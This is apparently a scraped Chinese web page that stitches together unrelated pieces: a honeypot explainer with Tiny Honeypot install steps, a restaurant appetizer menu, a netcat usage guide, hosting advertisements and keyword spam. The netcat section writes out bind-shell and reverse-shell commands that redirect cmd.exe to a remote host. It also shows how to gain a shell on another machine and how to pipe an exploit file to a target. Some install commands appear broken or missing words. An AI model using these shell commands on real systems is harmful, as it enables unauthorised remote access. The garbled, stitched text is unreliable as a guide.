Honeypotnc如何使用

Honeypot  时间:2021-05-30  阅读:()

'蜜罐系统是何钟系统

蜜罐(Honeypot)是一种在互联网上运行的计算 机系统。

它是专门为吸引并诱骗那些试图非法闯 入他人计算机系统的人(如电脑黑客)而设计的,蜜 罐系统是一个包含漏洞的诱骗系统,它通过模拟 一个或多个易受攻击的主机,给攻击者提供一个 容易攻击的目标。

由于蜜罐并没有向外界提供真 正有价值的服务,因此所有对蜜罐尝试都被视为 可疑的。

蜜罐的另一个用途是拖延攻击者对真正 目标的攻击,让攻击者在蜜罐上浪费时间。

简单 点一说:蜜罐就是诱捕攻击者的一个陷阱。

Honeypot的特点 (1) 它不是一个单一的系统,而是一个网络,是 一种高度相 互作用的Honeypot ,装有多个系统和应用软 件。

(2) 所有放置在 内的系统都是标准 的产品系统, 即真实的系统和应用软件都不是仿效的。

Honeypot分类 可以有多种方法对其进行分类:根据蜜罐 的设计目的不同,可以分为产品型蜜罐和 研究型蜜罐二种;根据蜜罐的工作方式不 同可以分为牺牲型蜜罐和外观型蜜罐二 种。

蜜罐的主要技术 蜜罐的主要技术有网络欺骗,端口重定向,报警,数据控制 和数据捕获等。

1.网络欺骗技术: 为了使蜜罐对入侵者更有吸引力,就要采用各种欺骗手段。

例如在欺骗主机上模拟一些操作系统一些网络攻击者最"喜 欢"的端口和各种认为有入侵可能的漏洞。

2.端口重定向技术: 端口重定向技术,可以在工作系统中模拟一个非工作服务。

例如我们正常使用WEB服务(80),而用TELNET(23)和FTP (21)重定向到蜜罐系统中,而实际上这两个服务是没有开 启的,而攻击者扫描时则发现这两个端口是开放的,而实际 上两个端口是HONEYPOT虚拟出来的,对其服务器而不产生危 害性。

3.攻击(入侵)报警和数据控制 蜜罐系统本身就可以模拟成一个操作系统,我们可以把其 本身设定成为易攻破的一台主机,也就是开放一些端口和 弱口令之类的,并设定出相应的回应程序,如在LINUX中的 SHELL,和FTP程序,当攻击者"入侵"进入系统(这里所 指是HONEYPOT虚拟出来的系统)后,当进入后就相当于攻 击者进入一个设定"陷阱",那么攻击者所做一切都在其 监视之中:如TELNET密码暴力破解,添加新用户,权限提升, 删除添加文件,还可以给入侵者一个网络连接让其可以进 行网络传输,并可以作为跳板 4.数据的捕获技术 在攻击者入侵的同时,蜜罐系统将记录攻击者输入输出信 息,键盘记录信息,屏幕信息,以及攻击者曾使用过的工 具,并分析攻击者所要进行的下一步。

捕获的数据不能放 在加有HONEYPOT的主机上,因为有可能被攻击者发现,从 而使其觉察到这是一个"陷阱"而提早退出 典型的Sebek部署。

客户端模块安装在蜜罐(蓝 色)里,蜜罐里攻击者行为被捕获后发送到网络 (对攻击者是不可见的)并且由Honey wall网关被 动的收集。

Tiny Honeypot介绍 Tiny Honeypot 是由e Bakos最初编写,Tiny Honeypot最出色的一点就是系 统容易受到攻击,不用担心电脑黑客和电脑高手们不能入侵,一般会成功的,Tiny Honeypot具有很好的收集那些坏家伙(入侵者) 入侵的信息和信息保存机制。

Tiny Honeypot安装: 首先要下载thp-0.4.6.tar.gz程序然后执行下列命令: cd /usr/local #切换目录到/usr/local zcat thp-0.4.6.tar.gz | tar -xvf - #解压gz文件 ln -s thp-0.4.6.tar.gz thp #建立软链接 mkdir /var/log/hpot #新建目录 chown nobody:nobody /var/log/hpot #设定目录权限 chmod 700 /var/log/hpot #修改查看日志权限 cp ./thp/d.d/* /etc/d.d edit d files to change to :"disable = no" #修改参数(后面详解) #make any path & preferences adjustements in thp.conf & iptables.rules ./thp/iptables.rules #修改规则 /etc/rc.d/init.d/portmap start #启动portmap pmap_set < ./thp/fakerpc /etc/rc.d/init.d/d start #启动d 配置过程: 1 .建议在ROOT用户上进行安装,"chmod 700 /var/log/hpot"修改 访问日志的权限,使只有ROOT才能对其进行访问 2.edit d files to change to :"disable = no" 3../thp/iptables.rules 编译iptables.rules访问规则,注意修改其 ip_forward环境变量为"". 0 4.对honeypot进行网络配置 对 Honeypot进行网络及环境变量配置,如IP地址, 允许正常使用的端口,Honeypot重定向的端口以久虚拟的 网络服务,如正常使用80端口进行WWW服务,21,23端口 进行虚拟,Honeypot可以虚拟出许多的服务,如FTP服 务,WWW服务,远程SHELL,SMTP服务等,在这里就不 一一细说了。

配置实例

Appetizers是什么意思?

头盘餐前小品Appetizers 1.各式刺身拼Sashimi Platter 2.锅贴Pot Sticker 3.辣汁脆炸鸡腿Fried Chicken Legs (Spicy Hot) 4.鸡沙律Chicken Salad 5.酥炸大虾Fried Prawns 6.酥炸生豪Fried Oysters 7.酥炸鲜鱿Fried Squid 8.海哲分蹄Smoked Jelly Fish 9.五香牛展Special Beef 10.白云凤爪Chicken Leg 11.琥珀合桃House Special Honey Walnuts 12.脆皮春卷Spring Rolls 13.蜜汁叉烧B.B.Q. Pork

nc如何使用

一、基本使用 想要连接到某处: nc [-options] hostname port[s] [ports] … 绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 参数: -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 G num source-routing pointer: 4, 8, 12, … -I secs 延时的间隔 -l 监听模式,用于入站连接 -n 指定数字的IP地址,不能用hostname -o file 记录16进制的传输 -p port 本地端口号 -r 任意指定本地及远程端口 -s addr 本地源地址 -t 以的形式应答 -u UDP模式 -v 详细输出——用多个-v可得到更详细的内容 -z 将输入输出关掉——用于扫描时 -w secs timeout的时间 二. 它的简单使用方法 1.nc -l -p 80 监听80端口 2.nc -l -p 80 >c:log.dat 监听80端口,并把信息记录到log.dat 3.nc -v -l -p 80 监听80端口,并显示端口信息 4.nc -l -p 80 -t -e cmd.exe 监听本地的80端口的入站信息,同时将cmd.exe重定向至80端口,当有人连接的时候,就让cmd.exe以的形式应答 5.nc -v ip port 扫描某ip的某个端口 6.nc -v -z ip port-port 扫描某ip的某端口到某端口 7.nc -v -z -u ip port-port 扫描某ip的某udp端口到某udp端口 7.扫描远程主机 nc -nvv -w2 -z 192.168.x.x 80-445 扫描192.168.x.x的TCP 80到TCP445的所有端口 8.REMOTE主机绑定SHELL nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口 9.REMOTE主机绑定SHELL并反向连接 nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 三.使用的例子 1. 计算机192.168.0.1运行:nc -v -n -p 99 计算机192.168.0.8运行:nc -e cmd.exe 192.168.0.1 99 这样我们就获得了192.168.0.8的一个shell 2.计算机192.168.0.1运行:nc -v -n 192.168.0.8 99 计算机192.168.0.8运行:nc -v -l -p 99 >d:sc.exe 四.高级用法: 1.作攻击程序用 格式1:type c:exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt 连接到192.168.x.x的80端口,并在其管道中发送’c:exploit.txt’的内容(两种格式确有相同的效果, 真是有异曲同工之妙) 2.作蜜罐用 nc -L -p 80 > c:log.txt 使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到’c:log.txt’中,如果把’>’ 改为’>>’即可以追加日志 3.作蜜罐用 nc -L -p 80 < c:honeypot.txt 使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,并把’c:honeypot.txt’的内容’送’入其 管道中

raksmart:全新cloud云服务器系列测评,告诉你raksmart新产品效果好不好

2021年6月底,raksmart开发出来的新产品“cloud-云服务器”正式上线对外售卖,当前只有美国硅谷机房(或许以后会有其他数据中心加入)可供选择。或许你会问raksmart云服务器怎么样啊、raksm云服务器好不好、网络速度快不好之类的废话(不实测的话),本着主机测评趟雷、大家受益的原则,先开一个给大家测评一下!官方网站:https://www.raksmart.com云服务器的说明:底层...

MOACK:韩国服务器/双E5-2450L/8GB内存/1T硬盘/10M不限流量,$59.00/月

Moack怎么样?Moack(蘑菇主机)是一家成立于2016年的商家,据说是国人和韩国合资开办的主机商家,目前主要销售独立服务器,机房位于韩国MOACK机房,网络接入了kt/lg/kinx三条线路,目前到中国大陆的速度非常好,国内Ping值平均在45MS左右,而且商家的套餐比较便宜,针对国人有很多活动。不过目前如果购买机器如需现场处理,由于COVID-19越来越严重,MOACK办公楼里的人也被感染...

特网云(1050元),IP数5 个可用 IP (/29) ,美国高防御服务器 无视攻击

特网云特网云为您提供高速、稳定、安全、弹性的云计算服务计算、存储、监控、安全,完善的云产品满足您的一切所需,深耕云计算领域10余年;我们拥有前沿的核心技术,始终致力于为政府机构、企业组织和个人开发者提供稳定、安全、可靠、高性价比的云计算产品与服务。官方网站:https://www.56dr.com/ 10年老品牌 值得信赖 有需要的请联系======================特网云美国高防御...

Honeypot为你推荐
李智慧李智慧和韩智慧是一个人吗?个人的详细资料怎样的?小四号字Excel小四号字等于几号字防火墙排名什么防火墙最好jstz江苏泰州市地税如何申报?qq网络硬盘如何使用QQ网络硬盘bt代理有人推荐我成为btbank代理人,这个没有什么风险?监控插件常见的监控软件有哪些微粒群算法多目标粒子群算法源程序黑客技术学习我想学习黑客技术请问应该怎么学语音合成系统求一免费语音合成软件(能将文字转换成语音,还能加背景音乐的)谢谢
asp网站空间 国际域名抢注 如何注册中文域名 google电话 加勒比群岛 韩国加速器 国外服务器网站 美国主机论坛 idc评测网 qingyun cdn联盟 华为云服务登录 无限流量 空间首页登陆 服务器是干什么用的 海外空间 智能dns解析 美国盐湖城 浙江服务器 域名转入 更多